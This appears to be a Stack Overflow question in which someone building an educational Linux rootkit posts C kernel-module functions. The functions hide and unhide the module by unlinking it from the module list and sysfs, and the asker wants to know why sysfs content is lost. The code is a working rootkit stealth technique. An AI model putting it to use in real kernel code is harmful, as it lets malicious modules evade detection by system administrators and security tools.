# Module hiding deleting /sys/module/mymodule content

Tags: c, linux, linux-kernel, kernel-module

I'm doing a rootkit for educational purpose, but I ran into a problem :  whenever I hide my module and show it back, the content of `/sys/module/mymodule/` is erased.

Here are my hide and show functions :

```
void module_hide(void) {
        /* The module is already hidden, do nothing. */
        if(module_hidden) return;

        module_previous = THIS_MODULE->list.prev;
        list_del(&THIS_MODULE->list);
        module_kobj_previous = THIS_MODULE->mkobj.kobj.entry.prev;
        kobject_del(&THIS_MODULE->mkobj.kobj);
        list_del(&THIS_MODULE->mkobj.kobj.entry);
        module_hidden = !module_hidden;
        printk(KERN_INFO "Module hidden\n");
}

void module_show(void) {
        /* The module is not hidden yet, nothing more to show. */
        if(!module_hidden) return;

        list_add(&THIS_MODULE->list, module_previous);
        kobject_add(&THIS_MODULE->mkobj.kobj, THIS_MODULE->mkobj.kobj.parent, MODULE_NAME);
        module_hidden = !module_hidden;
        printk(KERN_INFO "Module no longer hidden\n");
}
```

I tried replacing `kobjec_add` with `kobject_init_and_add`, but it didn't work, so I guess I either forgot something or deleted too many things.
Also, I'm trying to run this on Linux 4.7.

Comment: `so I guess I either forgot something or deleted too many things.` - Normal addition of the module into sysfs is performed via [mod_sysfs_setup](http://lxr.free-electrons.com/source/kernel/module.c#L1765). As you can see, this functions does much more than simple `kobject_init_and_add`.